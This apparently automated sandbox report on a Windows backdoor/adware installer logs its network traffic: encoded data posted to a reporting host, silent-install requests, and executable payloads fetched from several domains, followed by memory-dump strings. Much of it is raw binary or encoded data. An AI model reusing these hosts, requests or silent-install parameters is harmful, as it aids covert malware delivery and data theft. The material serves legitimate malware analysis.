..O.V.v.c.E.m.j.a.u.C.K.F.k.z.3./.X.Z.A.E.M.m.8.2.D.V.9.t.T.M.L.Q.M.d.O.D.t.u.t.M.L.U.5.7.Q.x.n.4.E.u.B.h.k.z.S.S.B.E.1.7.r.4.I.F.G.X.6.s.b.i.2.J.2.E.P.i.O.U.a.g.O./.g. .J.Q.v.g.U.A.c.8.u.8.M.Z.p.5.X.r.g.D.k.l.b.G.x.X.B.l.B.2.u.S.R.k.N.I.7.M.0.T.q././.R.B.R.Q.A.0.I.P.B.G.r.J.D.H.4.P.p.s.f.C.k.3.2.B./.2.0.l.S./.1.L.b.4.Z.1.j.8.4.f.B.M.L.0./.Q.m.B.X.R.f.g.L.0.P.U.h.O.Y.x.9.A.Y.7.E.u.V.8.p.8.I.S.Y.0.b.h.V.t.y.G.l.h.3.C.q.2.a.6.M.U.B. .b. .g.j.9.i.E.E.U.4.E.r.5.C.k.P.b.1. .L.M.q.6.P.5.r.f.W.S.x.j.z.4.n./.i.N.i.v.6.D.f.X.P.M.9.Z.O.Y.9.2.V.w.i.P.P.t.8.L.6.v.M.I.i.O.r.0.t.W.6./.i./.3.9.W.s.9.L.c.B.l.4.B.b.O.8.s.u.x.i.F.o.h.Q.8.a.4.N./.k.j.n. .M. .l.J.S.I.V.I.c.j.A.a.I.X.x.u.o.6.H.Q.3.Y.A.V.X.0.g.O.O.S.g.z.d.H.Z.i.H.W.O.z.z.x.9.X.E.K.y.B.7.H.y.m.d.8.P.5.i.7.E.2. .E.n.1.7.4.3.q.V.w.a.K.W.P.g.A.5.c.z.b.B.J.v.A.n.i.G.O.S.T.1.L.y.M.L.J.j.0.2.h.V. .4.e.u.I.g.M.8.6.o.X.l.a.u.C.B.0.L.g.o.q.b.u.D.f.A.N.W.h.m.R.Z.Z.5.g.z.F.B.2.4.M.V.w.5.u.m.R.j.E.H.E.0.g.v.f.S.R.R.A.W.U.H.e.r.N.V.e.2.y.w.1.o.w.z.D.5.S.B.j.M.u.M.e.N.r.P.q.p.Y.5.o./.e.6.T.c.i. .w.h.b.S.u.m.5.l.0.U.K. .3.X.c.K./.P.m.f.v.Y.g.O.q./.6.r.x.2.q.0.6.3.y.A.M.d.w.9.F.O.h.B.K.3.j.u.B.z.q.5.y.H.Y.H.A.P. .Q.H.S.y.K.6.s.F.s.7.q.d.o.t.D.y.s.g.B.Z.e.m.t./.z.Y.7.A.M.d.e.7.n.a.W.v.B.H.J.D.S.5.5.O.u.v.x.n.0.8.j.S.p.w.X.e.F.X.p.G.j.a.p.F.t.J.e.y.8.X.4.h.V.d.W.S.D.3.C.Q.N.k.L.i.e.D.T.R.6.6.P.g.l.l.U.m.5.w.4.1.J.L.p.x.m.U.j.f.q.Q.A.R.q.a.S.o.o.H.h.K.2.r.0.e.j.9.Q.7.p.q.b.W.E.9.r.R.X.f./.o.O.P.8.v.k.q.U.4.M.R.V.A.P.v./.y.h.J.j.c.k.8.S.S.b.p.K.c.O.A.X.D.X.Y.G.6.B.c.J.h.l.X.e.2.u.w.n.a.
<<< skipped >>>
POST / HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: r1.mytholiday.com
Content-Length: 3807
Cache-Control: no-cache
data=iIVyuxWUwnlz0PRJLF4JQ&report=VdXF6KKpvgk8eQltvqQkQlHlVcSxLOfSsfrrHa1w7XOmrJq45pJDC0vfFjauGToKOUB9Om87YsoBHA7GrgHtFTDUjBS2S00q9Vgdf4J/9sqQu3FwVNLfEDtUdsoli3ufqWlCXJIZKgGDC/8wXVRyfDDS408Y tl3Hujp2Gyncogq3ROEfvqdaA1eHfy4F6wv0NDwd1ThdAdgoAihodN zJ7EZAV6U128aFZmQYkegWIOfSJQ1BSV6uzaOP4Ifm/N00BB064qbDTCSru9FvdqC9MGY8ylwSpEEMAhK6xHGAObGPI8IzaLYQX9wqwbchSh0UmY0vLE033oHbwl9bzsFq70Fl8uMp0rtVu3NpctmnFvgMAhx3PWQeBRi1rGFqnBJgZ8eQOcIhGfmxhOIzjExeC2ndmugBioOZ65pDYw03J92lh4Y78Y1fUwiXRjTwBLbxVJnRZY2JgtJrUQNYeAXmJHvFNKRRPJJz8GFoj4v6BQeiQNfD3DPbhFx/IV3x9eX5In12ZVRqRH1YWL6/3hgJU4tIdz7ZksNMVlLxOdHnkeZq5DQnlBnIQ8tAht1mlhcRKMU8bK2z2el3s82LnUHY8ACFZK9Rp/EPDsvlBmKjLKgm5TDhzXY9gtHgvyAtz2CD etNYI6jw9GG9NEGhGOlS9SI82s4bTG4Z6kYVOp4ApTJy/4KH33lDTJsPHlsDtsJTCOS rawUOUkGp/wRbZ1BhU G1npbjxKduXSSwy4hZN8gCtiaRThNzAwHDUshCf83y3Nr8LoDzmUdV6pyidygSWilVwHqmKhJX0JI9V5eOy19lelJw8/fs7kST62nmQ0op7s31RavoH5jO194MHcrOTfYJfUoXARwZHilV9uxbWcRWT6ocZf19h4zkWPMjMWR1FXxJZM7AzZ2 FJYgp6zeAimAw5aJ3 nOdMI1hWp4V2gSsZhAYXdgm3eXVH/g1ECDFc6yPw55QJwRR3tZFluaXs8z9a5tvmg qxHx3SeibFtYP/MG1ZormIPh5eiGjlTDBEivUMPM uE0TM93J5vENnyXU2Ec4D P33eTS9FOn9xO0b6euAwx5ljDFVQ5tnQAZHAneOE71Mo eay12oI1ScZkybwZHP6SUYz kcBU1jLQWKf3h2OAZlXuw0YapPV6NrsCoYME3iVT2bCa3ORPXskSDXfMZJopmuJ/JF7FSgC3oRoyKw4Z9QuqE6BQyi21lS/rjMC2yxMn6W cKuQkjl0LGDQicF0Tu5Hg2TR37y9dmr5gfXGNPZ
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Sat, 09 May 2015 23:06:50 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 2
Connection: close
{}..
GET /?step_id=4&sf=1&installer_id=5459321632979031863&publisher_id=24406&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2310208155889048869&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=12802899647634509424&session_id=7757455632247121954&project_encode_id=24406&task_extension=1&payload_ver=dev&sr=0&enc_u_p=1&enc_u_p=1&st=0&IX_Startapp=1&pic_installer_ver=14&InstallerLink=0&SilentInstall=1&HideTaskbarIcon=1&AddToPayLoad=RunOnceMutex="alpha_installer"/n InstallerLink="0"&publisher_id=24406&download_id=2310208155889048869&installer_id=5459321632979031863&session_id=0&iid=5459321632979031863&did=2310208155889048869&installer_only=1&st=0&IX_Startapp=1&self_redirect=0 HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.storesis.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Sat, 09 May 2015 23:06:32 GMT
Content-Type: text/html
Content-Length: 9710
Connection: close
Content-Disposition: attachment; filename="4.txt"
..e.n.p.4.H.k.g.f.B.P.t.v.e.c.u.h.a.b.k.J.W.P.x.l.m.L.v.Q.Z.c.q.z.u./.H.o.p.C.O.b.w.0.V.m.c.e.v.0.R.b.h.U.b.R. .9.O.V.S.U.L.t.L.0.j.v. .5.u.t.6.H.a.5.Q.w.V.U.r.U.y.q.m.G.U.k.A.9.Y.q.D.F.l.c.O.v.i.n.v.X.X.f.N.x.B.e.c.l.v.5.g.L.3.a.Z.O.F.u.o.X.V.j.E.l.Y.l.R. .K.G.l.o.E.i.O.h.3.E.Z.A.e.R.B.7.I.p.r.g.j.R.B.k.A.0.x.m.F.J.s.x.R.z.p.O.3.A.t.i.R.r.j.m.S.e.L.g.7.M.l.W.E.Z.5.I.R.U.v.x.w.h./.1.y.X.b.y.X.p.t.m.T.5.g.n.H.M.h.a.7.B.L./.h.7.M.t.u.y.M.Y.J.5.o.6.R.s.1.p.G.F.L.X.7.i.c.R.I.K. .y.c.J.F.b.Y.I.L.l.G.E.R.B.h.V.I.C.N.H.F.Y.C.5.6.i.I.J.v.G. .g.q.l.q.V.H.A.4. .2.i.F.R.V.k.H.d.U. .o.w.8.6./.z.w.l.0.Y.U.O.T.b.J.E.y.w.r.y./.j.f.F.V.h.W.C.p.p.f.3.x.c.Y.z.i.Q.B.y.6.z.f.s.1.b.6.O.D.M.X.M.c.a.Y.k.K.7.P.r.0.m.F.n.T.R.r.H.J.J.Q.T.s.s.K.j.g.2.A.i.u.Q.t.P.d.P.h.B.A.P.j.S.a.G.D.s.f.0.w.O.F.a.e.r.c.B.z.8.Z.t.n.o.T.t.Z.E.s.n.Q.h.u.d.R.E.x.4.l.c.I.7.m.C.y.G.Z.F.G.e.W.d.p.p.v.A.V.T.s.S.q.E.j.Q.y.5.X.2.k.7.T.p.v.n.n.e.Q.o.q.o.1.R.j.3.c.B.w.v.O.I.o.G.a.u.I.k.Q.G.M.Q. .I.m.Q.U.p.D.u.A.V.F.C.2.S.Y.4.9.T.Z.3.m.L.e.5.r.p.Y.8.t.H.7.w.P.d.O.s.t.v.W.h.S.6.V.D.a.e.L.8.3.D.R.s.C.3.l.7.J.Y.B.8.e.u.w.T.O.6.0.k.O.P.K.o.S.M.p.l.Q.2.C.3.U.0.U.B.V.1.Q.5.G.y.W.z.x.8.V.B.a.i.F.m./.e.m.B.p.U.H.v.A.r.C.Q./.h.d.4.A.v.K.3.F.x.A.V.R.V.a.b.S.T.A.S.G.F.3.d.H. .I.J.g.r.W.T.q.a.O.q.R.C.E.U.7.b.9.a.S.L.g.R.R.4.m.s.s.E.8.M.8.B.n.M.Z.6. .t.b./.X.Q.R.d.b.c.A.w.a.k.B.l.2.x.5.m.U.x.l.f.m.T.u.C.N.j.s.N.9.j.X.C.K.8.A.E.y.D.W.q.1.F.r.x.X.G.3.q.K.H.6.C. .a.Z.w.T.m.Q.P.s.a.J.V.0.c.f.9.a.X.D.9.t.o.X.l.o.B.I.K.3.r.a.d.D.R.c.w.p.6.c.W.p.X.6.P.7.d.S.V.3.i.w.p.a.g.T.u.w.m.z.e.0.
<<< skipped >>>
GET /hp/?q=XDOtvcE+9jE/sqMztvXFjnV0Q9S5QAWSoMFJVLK2BupEE8V7TCpqJoGq/iUeUKvbvmDwEpIGujfPRivaynoO9il//gnTI+akMQhfaElhTWusj5ht3kdqYS0gcmr8lJRjyYajy0WmpJYzt8V1hGGJd6bu1v1Wjq6fQOF0vAXOLe0aIPkSZPKdnETmEH0PtwjHTGUMXNiBdiO7KPOOSY8c/Dvf5mTLc05Yr1a5uwXIQgSoV30s915myZ8+GZD2/5iQxW6ZCDtTnWb5vPL/R0cB3VtBtXt++aiHLFtYt9rxpIMJS30soMfKTAbZNbyO4WGAc4gMuLVlHX4yIkVjv+6VAlvUM HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36
Host: linq-goody-best.xyz
HTTP/1.1 200 OK
Server: openresty
Date: Sat, 09 May 2015 23:05:58 GMT
Content-Type: application/octet-stream
Content-Length: 547095
Connection: close
Content-Transfer-Encoding: binary
Access-Control-Allow-Origin: *
Content-Description: File Transfer
Access-Control-Expose-Headers: Content-Length
Content-Disposition: attachment; filename*=utf-8''download.exe; filename="download.exe"
..r8...bF.Yx.......j.A.{.].k.......h.....E.......D..-JD..^RH..........e......U......%..>......Y.L{.Dk..x....4..<..|.nj..#....R.-y/.dZ....G ....!...t...c......?...S......._3...[.....-gx......;.."gx.7.WI>\ z|..j.d.....c..}.D...5....t.......6..*..y.f..........Q.....K(........n.jI...Mth#...{.|?..w.=..X.......2D.5y.B..................lc.F........=....da.......H.-...L>.[.2....SY...1.c..7....I.^.,N=..M.y......:kFY...i....5. .y...^7..A-..7Y4.M"......D.?...r......>...X..=.clI...........s.c.q3.)4.1;s .On..f=...F'%.h....{..0..X...*'..N./..T...\a..Z..1U-..6P...U.n...V<X...G........~.....MrN.....k.....L....r../>3.Qczvr........z>T..@.a..n...<P.^r...3.`o.p...l.@.{9i{..c..^..G.*.........AZ.2....`...\n......Xe.c. 222.y.DG......,.0.9.....Wi..w....#n_../R..3.%~.< .v.Iw/. .Qt....>....`.!..d..*.... .D.7g.P..8..._..{.x^.f..o.*.}m,..........3 ..T.Vu..W...rS.2.i{..@..uA4...>V2.w....v.F..e.9..E.....P....n(.P.eL.F&.r#.0....R.=...5..0.1.9V.yj..%..........(..&C.2XN;..h.......x.%#.1T1.(3...R.......wD.~....I.(.lB.B.......&......#9........]...^..S...k&6.d'..04.....MNf.55..;.IF. ...w....N.S.<?.....<....z.>r.dD.{b6......*}4.[...R...X.....%^{%r...`r6..)Q...^....2 ...OC#9...NqK..S.]X'.../.(g.UF..5..:njCP..~.X...G....#....a.....k..J.Z.......\:|..X..s%.L...Y...^Y.H..@..dA..'kW.A.s..;......k..x......i...z..............2z...?.B...=n......OC3..R.... 0 .. A..f.t.....R3... |...Iin....7'.m'v...nD..9.,..ua.@Q..4.O..:a.....l_...g8.&....:..5......v...Cq..^..j....4....P.K.[.....R...$if...M.,.g.F..._p.........x.".
<<< skipped >>>
POST / HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: r1.mytholiday.com
Content-Length: 4532
Cache-Control: no-cache
data=39ZH7x2d1y6Icv1defocsdCTnOTqMgTdh3aIlyGSKJupDB4MrUsKm9xC 4w3Nc7bRRe9qw3P1xG0ANsWnJCVI2r Z5mH5aBn8FttrxxFGN1 IHbZ/HJZ/5lWvWtjmwqqkP6Bb NPW5ZpO GGZw6CBzegOG5 Ds4X6XSMPUjpfUQ8YKnWxecsSPOyABHcJMPJ8UslQJf4MqVqJQkYapEqeOyASZaWejNcwWt75MWIp3BQRO2SbwG/j8 MlZeCZAhU2ekXxV7bOA5gzat/ jtIz1NuNs2bZG/mD8umcTxGiF4Xjh96NkJwl7kb0ImZ1eST4oLRQkxS3Eg/SBzcgKQg2ik4ySJRJMBgpJeaznLYPhQBbsPZeWqUbtYpAAwr1wEG/32Xx8UqAzs51Cy6yeuQDKysZoxcU7Jjj1sF7Lx7CVwEoXkb6uvjUHdUKkYOdpCuqwkQdTIukh6/hmlCmvPaGjROOoUG4wSwdN wFzRYPZK27pnbCVvOr92Pho2lNpU1 cgCJACBH9QUtU2cyUel M6fT6v76dUCO9zcKd7lcDJ31PfjCOIsWx3pluarLfgtu9FxzdLFqgoLK1bS0iHQdVfE1t7SPDmyeqeH9QTWlzrI7Ba6SDeFAYy4gy8Vd7PouBbsmamo02OosmPriOCbX5FTf lzbLeZjMQizliuysVKLYLJ5yuNqI6jR9BfZ2IA6oLmgqRfigYGqGYXGWnsZV8hROtIuqVAFTRiCLnkYGm3hRCBUME7zDfF66SKSOMbVfy48JXUsyClUGlWjdiP5VE8x4A/TBo3awyQvB kXhArJRqG Y0tSmjhskMi002QiFM4R21vdR24GYhttiSnDNb8s6iFePiR0NiuWFkDo67otxZf8hRX6oflpniVzlR B8dyKCZO18N3GfCMWoUu12PDBxPE5mgsu&report=QH8R3fNPd1n9AgdnikFSDxwHv6AB55R ilZSoU8gPOuyCI8PPAlwYAw5idmolx/avfKXiqKIqpjTRZ 0nXC3M4A9DMXyluhnxUMbsE AjOPZF/M3Ac2yxUOibgYmjc3K/E67aHyjeutBzsVNLOSDWrU1YO6ljydc7GUJDj8A3zl0a /OaNgyncMe3FDp/fZ088wqQnolFlFKaKX2PQQgJhwSZtZ ZVCr5b5TKMrRzK3LmddoQKljfzDwFUUL95Ic Yzb1wTyHtXSe8eZx2Dd2j3GOFbup28vZ/3VAMv8uFyRaHU3/3TEw0J8HqQX0xvUX0beVUlSiu6QwP2wuGZlTfqvFjsyI0lx/GYbrztT3arOvC5
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Sat, 09 May 2015 23:06:03 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 2
Connection: close
{}..
GET /?e=whcop&sfx=2&cht=0&publisher=&ind=5459321632979031863&exid=0&ssd=7757455632247121954&hid=12802899647634509424&osid=501&fc=1&jc=1&cha=0 HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: goldavid.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Sat, 09 May 2015 23:06:04 GMT
Content-Type: application/octet-stream
Content-Length: 2012618
Connection: close
Content-Disposition: attachment; filename="9Bgp6JPux0JTfR.ca"
Content-Transfer-Encoding: binary
Access-Control-Allow-Origin: *
..z.....$V........'.................,.@.........M~.l....$Dh.O ...d.....< .....8\.....4X|....0Tx....,Pt....(L@....;.b...1..i.}..t)......N.....zV3....0F-....,t. ...lI~y....(Lp.......n.....Y.Nm.3O.t.9M).o.W.x..s..6...iS8..#..I..*.........c.-....xC...."...Cm.3.3v.:M)...W....s..4...iS^}.#..I.X.......xS.c.-.....Co.......Om.3.....M).`.....8\.....4X|....0Tx....,.u...Ee.p....$Hlp... Ec.....@......<......8\.....4Xl....0Vx....,Pt....)Lp....4El....zSe.....@d.....<`.....8\.....4X|0L...Tx.T..,.t...d#L.....$Hl.... Dh.....@......<`.....8\.....4X|....0Tx....,Pt...%.L0....$Hl.... $m.....@d.....<`.....8\.....4X|...tDTx....,Pd...L-Lp....$Hl.... Dh....|n......<P....t=\.....x]|....0Tx....,.t...`I8......Ll.$.. .l.....@d.....<`.....8.....s4X|@...04s....,Pz....(Lp....$Hl.....6...... ......<`.....3\.....4X|....pTx....,Pt....(Lp....$Hl.... Dh.....@d.....<`.....8\.....4X|....0Tx....,Pt....(Lp....$Hl.... Dh.....@d.....<`.....8\.....4X|....0Tx....,Pt....(Lp....$Hl.... Dh.....@d.....<`.....8\.....4X|....0Tx....,Pt....(Lp....$Hl.... Dh.....@d.....<`.....8\.....4X|....0Tx....,Pt....(Lp...U......?...`;...xd...4E.0l:...a.C.C..IH|..cI8...)..(P!.PkA$.x....,...?4.eLi.;%?.......N..........f..E.....cM4o:....-kv....h.r.x.. H9.XS.(.=.9.qTD9J.....1.W...9...E..f.,.O ....c.&.,..t7....t..W...`...<`.j.p.:.@......i.h.3...9|. ..0X%%.Q|-Rh..,Y..|p...(.5.q..$.....?u...3..........qh.$...........-p_......cK....|..D..\..30Q.=`..$..`x...}.......].1......\./....P|.O.Z.!t.(6.(P.X7..q.@...@ ....3...l....B......X.e.A...8...C....=.
<<< skipped >>>
GET /?e=wxd&dd=20&ams=6&emnum=38&publisher=&ind=5459321632979031863&exid=0&ssd=7757455632247121954&hid=12802899647634509424&osid=501&fc=1&jc=1&cha=0 HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: loveshero.net
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Sat, 09 May 2015 23:06:18 GMT
Content-Type: application/octet-stream
Content-Length: 1139531
Connection: close
Content-Disposition: attachment; filename="2UzDN7fW9Yl4sH.ca"
Content-Transfer-Encoding: binary
Access-Control-Allow-Origin: *
..z.Gc...!.......nT.....-...-.........tD.c......[.........7Q.OIj}d..........= [.arv.........Lr>M_Fdf........S., 'AWq9..........0>a.Sfj...........#..Efb.........PN6&X@bb.........LRY.GIs}..........." uHmy..........*4 R.Xi..........o.2ZEsx..........%8=IEu..........K.k~..*8.........DQ.gz.-8.........<]..A']nt.........W.<M].Yo.........Vn}...#0........7Q................rj..!c......M.r......yj[..............zk\M>/ ..........{l]N?0!...........m^ON....A......A\:792.Sfj...........q V.gs........_..6&.(...............2....U\....Q.,..B...\.l...(a....R...f&|#.q8|.,..b...W@.2.aHq...Ir...lN...QXa..$Y.... YC..Ah.......w8.J;`....(......xiZK.-............j[L=..p........Izk\M>? ..........{l]N?5!..........|i^O@1"..........mn_PA"#..........~o0QC3....l.......p!SCT&...........qbSD5&...........rcTE6'...........sdUF7(.......X]..4eVG8).......q...tfWH9*...........vgXI: ...........wn.J;,....E......xiZK<-.............:8\..RG........zk\.>/ ..........{,]N..Esw........|}_O@#"..........}n_PA2#T..'......~o.RB3$U..........paRC4%.............? V&...........rcTC7'...........s$UFu(...........teVG8)...........ufWH9*...........vgXI: ...........whYJ;,...........xiZK<-...........yj[L=............zk\M>/ ..........{l]N?0!..........|m^O@1"..........}n_PA2#..........~o`QB3$...........paRC4%...........qbSD5&...........rcTE6'...........sdUF7(...........teVG8)...........ufWH9*...........vgXI: ...........whYJ;,...........xiZK<-..Uz.P(....xzh..k.#.....?...?...0o ..7...#...{...o.d.S.......<9.c....g.E.\.E.Vd.n_P..~.......f[..OaAC
<<< skipped >>>
GET /?step_id=6&sf=1&installer_id=5459321632979031863&publisher_id=24406&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2310208155889048869&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=12802899647634509424&session_id=7757455632247121954&project_encode_id=24406&task_extension=1&payload_ver=dev&sr=0&enc_u_p=1&enc_u_p=1&st=0&IX_Startapp=1&pic_installer_ver=14&InstallerLink=0&SilentInstall=1&HideTaskbarIcon=1&AddToPayLoad=RunOnceMutex="alpha_installer"/n InstallerLink="0"&publisher_id=24406&download_id=2310208155889048869&installer_id=5459321632979031863&session_id=0&iid=5459321632979031863&did=2310208155889048869&installer_only=1&st=0&IX_Startapp=1&self_redirect=0 HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.storesis.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Sat, 09 May 2015 23:06:52 GMT
Content-Type: text/html
Content-Length: 8562
Connection: close
Content-Disposition: attachment; filename="6.txt"
..T.m.U.x.B.Q.b.d.M.U.9.9.U.d.a.W.Y.S.0.N.h.g.U.y.G.X.P.a.Y.B.C.K.k.B./.U.z.e.X.S. .A.h.h.2.4.j.4.D.L.6.T.8.y.X.F.o.r.A.K.G.r.m.p.T.c.U.E.I.5.1.N.A.b.U.1.Z.7.q.4.2.a.n.I.v.l.9.C.4.a.O.m.D.F.2.y.O.G.y.A.H.P.C.g.U.S.i.f.R.V.j.y.v.A.z.o.e.1.r.v.k.N.a.9.c.3.W.B.C.P.h.E.J.l.U.b.n.a.d.H.h.z.9.t.P.H.h.f.g.G.f.5.G.H./.n.q.V.S.Q.p.N.k.p.B.z.r.W.J.e.K. .t.R.Q.a.e.T.6.q.r.E.W.S.p.O.X.X.Q.f.i.6.K.G.w.X.F.S.w.R.O.9.S.l.g.F.z.w.e./.G.s.o.b.v.l.P.b.O.u.j.N.a.V.A.a.s.H.V.F.b.n.2.i.x.9.n.q.S.c.v.X.h.Z.a.s.P.Y.K.f.e.z.q.d.w.T.r.F.u.n.z.1.x.8.P.D.3.L.I.y.s.0.u.k.r.t.c.H.v.9.S.b.V.z.g.6.M.K.P.O.K.c./.j.1.2.0.Q.c.Z.O.Z.w.Y.a.H.d.r.E.v.j.K.4.Q.E.Z.L.s.M.v.n.9.6.7.a.c.q.2.6./.S.f.R.v.q.5.T.5.D.u.P.R.d.x.V.w.1.9.x.w.c.C.z.4.W.B.a. .m.L.P.p.z.Y.i.L.q.g.e.D.b.q.r.v.t.w.3.s.9.F.T.i./.h.S. .V.2.U.2. ./.r.U.3.7.3.n.X.q.x.B.5.c.U.F.I.G.n.k.t.L.m.S.O.s.n.t./.P.B.8.e.K.b.c.2.y.9.H.c./.7.2.s. .c.2.f.T.L.t.N.v.c.J.7.M.a.y.g. .p.z.h.M.R.Z.n.o.v.o.W.C.v.h.d.B.J.B./.T.s.K.f.K.q./.5.8.u.V.x.1.X.O.m.I.r.T.h.b.U.C.1. .G.E.Y.H.6.7.6.p.M.S.G.t.C.5.y.u.W.X.w.Z.f.T.n. .A.6.r.H.w.v.o.O.m.D.K.j.7.u.3.a.1.k.2.U.t.y.r.b.G.f.u.a.r.g.i.1.e.2.r.r.r.E.n.V.r.c.W.8.c.W.p.f.o.q.l.p.G.d.k.E.M.Y.x.a.A.y.c.V.4.N.K.w.8.Q.M.v.f.X.C.8.j./.H./.N.Q.Z.i.u.0.t.a.W.m.c.j.g.w.j.m.q.5.8.i.k.z.l.4.1.K.s.0.f.k.b.N.5.v.b.i.z.G.t.I.L.j.I.Y.1.H.Y.y.8.7.A.J.h.U.q.J.N.T.B.C.q.d.o.b.5.l.K.u.N.y. .9.D.W.J.d.E.0.n.T.f.c.f.h.9.N.w.k.y.q.C.3.H.b.A.W.E.r.q.u.9.f.i.o.d.9.i.G.5.E.4.Z.M.k.t.z.c.A.r.O.Y.1.N.A.Z.n.h.p.J.W.i.d.6.f.F.y.X.8.x.P.f.O.6.B.p.g.d.7.A.f.1.r.C.z.m.v.u.U.m.g.j.P.M.3.n.J.O.
<<< skipped >>>
GET /?e=nnnbvv&publisher=&&dd=3&ind=5459321632979031863&exid=%UpdateInfo_ExternalID&bijo=1&ssd=7757455632247121954&hid=12802899647634509424&osid=501&sfx=2&jc=1&cha=0 HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: storestral.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Sat, 09 May 2015 23:06:34 GMT
Content-Type: application/octet-stream
Content-Length: 1962996
Connection: close
Content-Disposition: attachment; filename="xoL9D9NSNKXd4Z.ca"
Content-Transfer-Encoding: binary
Access-Control-Allow-Origin: *
..z......A3.....U........;...;.......Y..........[..\..>o.%:..(......S[..... ...qD.D...}M.;t..n(.....P\..=..,E..=l.3G..1f..... u..L...u.....SI..<a..w..73.=... d..T...q..4...E...n..I..k*..^..9|..J..]:..'...R...d.K`...T..V..9b..j...k..2..)P..!c..A..#M.T....s..Q..-\..l..bU..&s..D.."m.E...?y..J..$}..4.. k...S..\.."m.*U.. d..]...h..#...O...x.Ua..3d..T...%..2..?{..)..%d..j6.BJ..11..Q..<q......~.."..YE..}".%F..#|..\..5}..\..BS..,...C..;;..P..?z.VU..cY..m...k..,..-X..=t.3G..1f.....1~..Y..?j..{...N..)l..Z..>a..D..4 ..c...v..!..5*...o."d..r...C..4|..L..B*..u..X....a..O..)F..U...`......w..#...M..jB..g..9F..\..*|..2...h..9...E...r.?_...O..u..4i..h...q..%..J...:o..K...5......S..{..&!..t..]....D.E...i<.M....m..c...v..!...R...i..}..m*..D..w?..L...}.."...N..gu..F..1d.W...kx..A...u../...I...H.&}..=`./T...5..O..8V..t.......%.2L..>y.-s..`D..`..:n..9..=z...o.(\...`. t..hh..^..4O..y..1...}l.EP..gz..c..l~..{../,..9...g...3..]..u:.3g../~..V..U ..e..,G...J.E~...\.:@...Z.....S~.....0J...a.!b...Y..w..ie..{..:~.....[H..14.8j..u:.:e...@..]..&!..7...X...%.6k..$f.:G..o~..z...p..q..QD..<1.D_...0..... f..y..7u..x...s...q.=j...r..X..>c..[..2J..s..\X..zF.$@...1.]....V..S..8R.....,c...e.2k..`x.JW.. ..l..%I..:..M...'k.AZ..4_.LA..RK..\..2}..2..bI..<a..M..9l.Z...a#.....Y/..s..^...;e..A...a.E...m'.....R*..q..Q...Be..M..9g.'Y..z!......}..)..U...Bi..\..<W..@..z#..J...k..2...T..j2.A...e%.A...b .....jC......I..Bu..I.."k..V..e2..`..6V..(...u...O......J.3I..s"..H..#N.....0N..&w..k...d..R..)w..o..3O.....^...%/..c..aA..}..0A..|
<<< skipped >>>
Map
The Backdoor connects to the servers at the folowing location(s):
Strings from Dumps
rundll32.exe_1432:
.text
.text
`.data
`.data
.rsrc
.rsrc
msvcrt.dll
msvcrt.dll
KERNEL32.dll
KERNEL32.dll
NTDLL.DLL
NTDLL.DLL
GDI32.dll
GDI32.dll
USER32.dll
USER32.dll
IMAGEHLP.dll
IMAGEHLP.dll
rundll32.pdb
rundll32.pdb
.....eZXnnnnnnnnnnnn3
.....eZXnnnnnnnnnnnn3
....eDXnnnnnnnnnnnn3
....eDXnnnnnnnnnnnn3
...eDXnnnnnnnnnnnn,
...eDXnnnnnnnnnnnn,
.eDXnnnnnnnnnnnn,
.eDXnnnnnnnnnnnn,
%Xnnnnnnnnnnnnnnn1
%Xnnnnnnnnnnnnnnn1
O3$dS7"%U9
O3$dS7"%U9
.manifest
.manifest
5.1.2600.5512 (xpsp.080413-2105)
5.1.2600.5512 (xpsp.080413-2105)
RUNDLL.EXE
RUNDLL.EXE
Windows
Windows
Operating System
Operating System
5.1.2600.5512
5.1.2600.5512
YThere is not enough memory to run the file %s.
YThere is not enough memory to run the file %s.
Please close other windows and try again.
Please close other windows and try again.
9The file %s or one of its components could not be opened.
9The file %s or one of its components could not be opened.
0The file %s or one of its components cannot run.
0The file %s or one of its components cannot run.
MThe file %s or one of its components requires a different version of Windows.
MThe file %s or one of its components requires a different version of Windows.
UThe file %s or one of its components cannot run in standard or enhanced mode Windows.3Another instance of the file %s is already running./An exception occurred while trying to run "%s"
UThe file %s or one of its components cannot run in standard or enhanced mode Windows.3Another instance of the file %s is already running./An exception occurred while trying to run "%s"
Error in %s
Error in %s
Missing entry:%s
Missing entry:%s
Error loading %s
Error loading %s